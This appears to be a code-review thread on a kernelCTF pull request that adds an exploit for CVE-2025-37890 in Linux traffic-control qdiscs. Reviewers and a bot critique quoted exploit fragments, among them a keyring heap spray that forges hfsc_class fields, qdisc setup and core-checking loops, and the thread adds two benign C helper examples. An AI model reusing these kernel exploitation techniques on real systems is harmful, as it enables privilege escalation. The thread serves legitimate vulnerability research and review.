Add kernelCTF CVE-2025-37890_lts_cos_mitigation #302
phlaie wants to merge 4 commits into google:master from
Conversation
Working on addressing LTS stability issues (same as PR 301).
matrizzo
left a comment
Hi, thank you for your submission. There are a few style issues, please take a look at our style guide and try to fix them. In particular try to get rid of all the unused code and assign names to all hardcoded constants/explain why they have that value.
| void mypause() | ||
| { | ||
| printf("[~] pausing... (press enter to continue)\n"); | ||
| char scratch[11]; | ||
| read(0, scratch, 10); // wait for input | ||
| } |
Remove unused code parts from the source code. The function mypause is defined but never called.
https://google.github.io/security-research/kernelctf/style_guide#unused-code
| size_t candidate = 0; | ||
| size_t hashmap[1024]; // ~ 0xffffffff80000000-0xffffffffc0000000 | ||
| memset(&hashmap, 0, sizeof(hashmap)); | ||
| sleep(10); |
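Review bot: `memset(&hashmap, 0, sizeof(hashmap))` zeroes the array through a pointer-to-array; it works, but `size_t hashmap[1024] = {0};` says the same thing without the call. More importantly, neither the name `hashmap` nor the comment `// ~ 0xffffffff80000000-0xffffffffc0000000` explains how 1024 slots cover that 1 GiB range (a linear bucketing would be 0x100000 per slot); give the bucket size a named constant and use that constant in the index computation so the mapping is visible to the reader.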
Add a comment to every sleep() explaining what you are waiting for.
https://google.github.io/security-research/kernelctf/style_guide#sleeping-waiting
| for (size_t i = 0; i < REPEAT; i++) { | ||
| set_cpu(i % 2); | ||
| sleep(1); |
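Review bot: `set_cpu(i % 2)` hardcodes a two-CPU machine; name the count (for example `NUM_CPUS`) or derive it from `sysconf(_SC_NPROCESSORS_ONLN)`, and say in a comment why each iteration has to alternate between cores, since the loop body only makes sense when at least two are present.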
Add a comment to every sleep() explaining what you are waiting for.
https://google.github.io/security-research/kernelctf/style_guide#sleeping-waiting
| int send_req_noblock(int priority) | ||
| { | ||
| return _send_req(priority, 1); | ||
| } |
This function is not used.
https://google.github.io/security-research/kernelctf/style_guide#unused-code
| /*keyring section*/ | ||
| #define KEY_DESC_SIZE (0x200 - 0x18 + 1) | ||
| char key_desc[KEY_DESC_SIZE]; |
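Review bot: `0x200 - 0x18 + 1` in `KEY_DESC_SIZE` is three unexplained numbers. Say which allocation size 0x200 is meant to land in, what the 0x18 header is (the later write `key_desc[CF_NODE_OFFSET - KEY_DESC_HEADER_SIZE]` already uses a `KEY_DESC_HEADER_SIZE` macro, so reuse it here if it is the same quantity) and that the `+ 1` is room for the NUL terminator, e.g. `#define KEY_DESC_SIZE (TARGET_SLAB_SIZE - KEY_DESC_HEADER_SIZE + 1)`.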
This should be a local variable.
https://google.github.io/security-research/kernelctf/style_guide#miscellaneous-notes
| int setup_vuln_tree(const int netlink_fd, const char *multiq_band_name) | ||
| { | ||
| // create netem with poison settings | ||
| SYSOK(create_qdisc_netem(netlink_fd, get_id("3:0"), get_id(multiq_band_name))); // :1 is bands[0], :2 is bands[1] |
Use constants here for the handle IDs like "3:0".
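The handle-ID point above, shown as an added example in C. This is not code from the PR or from kernelCTF: the PR's `get_id` helper is not visible here, so the example assumes it maps a `"maj:min"` string to the 32-bit handle netlink expects. The major numbers, the macro names and `tc_parse_handle`/`tc_format_handle` are hypothetical names chosen for the example; the bit layout is the one `TC_H_MAKE`/`TC_H_MAJ`/`TC_H_MIN` use in `<linux/pkt_sched.h>`, reproduced so the block builds without kernel headers.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* A tc handle is a 32-bit value: major number in the high 16 bits, minor in
 * the low 16. Same layout as TC_H_MAKE/TC_H_MAJ/TC_H_MIN in <linux/pkt_sched.h>,
 * redefined here so this example builds without kernel headers. */
#define TC_HANDLE(maj, min) ((uint32_t)((((maj) & 0xffffU) << 16) | ((min) & 0xffffU)))
#define TC_HANDLE_MAJ(h)    (((h) >> 16) & 0xffffU)
#define TC_HANDLE_MIN(h)    ((h) & 0xffffU)

/* Named handles in place of "3:0"-style literals. The major numbers below are
 * assumptions for this example, not the PR's values. */
#define MULTIQ_MAJOR            2u
#define NETEM_MAJOR             3u
#define MULTIQ_QDISC_HANDLE     TC_HANDLE(MULTIQ_MAJOR, 0)
#define NETEM_QDISC_HANDLE      TC_HANDLE(NETEM_MAJOR, 0)
/* multiq child classes are numbered from 1: class :1 is bands[0], :2 is bands[1]. */
#define MULTIQ_BAND_HANDLE(idx) TC_HANDLE(MULTIQ_MAJOR, (idx) + 1)

/* Parse tc's textual "maj:min" form (both parts hex, as tc(8) reads them; a
 * missing minor means 0) into a handle. Returns 0 on success, -1 on bad input. */
static int tc_parse_handle(const char *s, uint32_t *out)
{
    char *end;
    unsigned long maj, min = 0;

    if (s == NULL || *s == '\0')
        return -1;
    maj = strtoul(s, &end, 16);
    if (end == s || *end != ':' || maj > 0xffff)
        return -1;
    s = end + 1;
    if (*s != '\0') {
        min = strtoul(s, &end, 16);
        if (end == s || *end != '\0' || min > 0xffff)
            return -1;
    }
    *out = TC_HANDLE(maj, min);
    return 0;
}

/* Format a handle back into "maj:min" for log lines and netlink error messages.
 * Returns what snprintf returns (characters that would have been written). */
static int tc_format_handle(uint32_t h, char *buf, size_t len)
{
    return snprintf(buf, len, "%x:%x", TC_HANDLE_MAJ(h), TC_HANDLE_MIN(h));
}

int main(void)
{
    char buf[16];
    uint32_t h;

    tc_format_handle(NETEM_QDISC_HANDLE, buf, sizeof buf);
    printf("netem qdisc handle 0x%08x = %s\n", NETEM_QDISC_HANDLE, buf);
    tc_format_handle(MULTIQ_BAND_HANDLE(1), buf, sizeof buf);
    printf("multiq bands[1] class 0x%08x = %s\n", MULTIQ_BAND_HANDLE(1), buf);
    if (tc_parse_handle("ffff:", &h) == 0)
        printf("\"ffff:\" parses to 0x%08x\n", h);
    return 0;
}
```

With the handles named this way, a call such as `create_qdisc_netem(netlink_fd, NETEM_QDISC_HANDLE, MULTIQ_BAND_HANDLE(0))` documents which qdisc is being attached where, and the parser rejects malformed strings instead of silently producing a wrong handle.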
| // 1. setup plugs | ||
| for (int i = 0; i < num_tx; i++) | ||
| { | ||
| int band = 0x20000 + i + 1; |
These constants should be named/explained.
| struct netlink_send_cb_struct | ||
| { | ||
| void (*cb)(char *, size_t, void *); | ||
| void *cb_out; | ||
| }; |
This structure appears to be unused: it's only passed to __netlink_send, and the only time that function is called that argument is NULL.
| key_desc[CF_NODE_OFFSET - KEY_DESC_HEADER_SIZE] = 1; | ||
|
|
||
| /* hfsc_class.cl_e > cur_time (fail eltree_get_mindl)*/ | ||
| *(size_t *)&key_desc[CL_E_OFFSET - KEY_DESC_HEADER_SIZE] = 0xffffffffffffffff; |
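Review bot: `*(size_t *)&key_desc[CL_E_OFFSET - KEY_DESC_HEADER_SIZE] = ...` stores 8 bytes through a type-punned pointer into a `char` array. On x86 the unaligned write works, but it is strict-aliasing undefined behaviour and `size_t` is not the right type for an 8-byte kernel field. Write it with a fixed-width type and `memcpy`, e.g. `uint64_t cl_e = UINT64_MAX; memcpy(&key_desc[CL_E_OFFSET - KEY_DESC_HEADER_SIZE], &cl_e, sizeof cl_e);`; the single-byte `CF_NODE_OFFSET` store above is fine as it is.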
Use UINT64_MAX instead of 0xffffffffffffffff
| close(memfd); | ||
|
|
||
| while (check_core() == 0) | ||
| usleep(100); // 0.1ms |
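Review bot: `while (check_core() == 0) usleep(100);` has no upper bound, so if the condition never becomes true the exploit hangs rather than failing. Add a named timeout (a maximum poll count or a deadline), exit with a message that names what was being waited for, and put the poll interval behind a named constant; that comment also satisfies the style guide's request to explain the sleep.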
This sleep should have a comment that explains why it's here.
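The documented, bounded wait that the sleep comments above ask for, as an added example in C; it is not code from the PR or from kernelCTF. The PR's `check_core()` is not visible here, so a constructed `fake_core_ready` stands in for it, and the constant names, the timeout value and `wait_until` are hypothetical names chosen for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

/* Named poll parameters instead of a bare usleep(100) with a "0.1ms" comment.
 * The timeout is an assumed value for this example. */
#define CORE_POLL_INTERVAL_US 100u   /* re-check the condition every 0.1 ms */
#define CORE_WAIT_TIMEOUT_MS  5000u  /* give up after 5 s instead of hanging */
#define CORE_MAX_POLLS (CORE_WAIT_TIMEOUT_MS * 1000u / CORE_POLL_INTERVAL_US)

/* Poll ready(ctx) every poll_us microseconds until it returns nonzero or
 * max_polls attempts have been made. `what` documents the awaited condition
 * and is printed on timeout. Returns the number of polls made on success,
 * -1 on timeout. */
static long wait_until(int (*ready)(void *), void *ctx, const char *what,
                       unsigned long max_polls, unsigned poll_us)
{
    for (unsigned long polls = 1; polls <= max_polls; polls++) {
        if (ready(ctx))
            return (long)polls;
        usleep(poll_us);
    }
    fprintf(stderr, "[-] gave up after %lu polls waiting for %s\n", max_polls, what);
    return -1;
}

/* Constructed stand-in for the PR's check_core(): reports ready once it has
 * been polled polls_until_ready times. */
struct fake_core {
    int polls_until_ready;
    int polls;
};

static int fake_core_ready(void *ctx)
{
    struct fake_core *f = ctx;
    f->polls++;
    return f->polls >= f->polls_until_ready;
}

int main(void)
{
    struct fake_core core = { .polls_until_ready = 3 };
    long n = wait_until(fake_core_ready, &core, "check_core() to succeed",
                        CORE_MAX_POLLS, CORE_POLL_INTERVAL_US);
    printf("ready after %ld polls\n", n);
    return n < 0;
}
```

In the exploit the call would read `wait_until(check_core_cb, NULL, "<what check_core waits for>", CORE_MAX_POLLS, CORE_POLL_INTERVAL_US)`, with the string replaced by the real condition; the description lives next to the wait, and a stall produces a diagnostic instead of a silent hang.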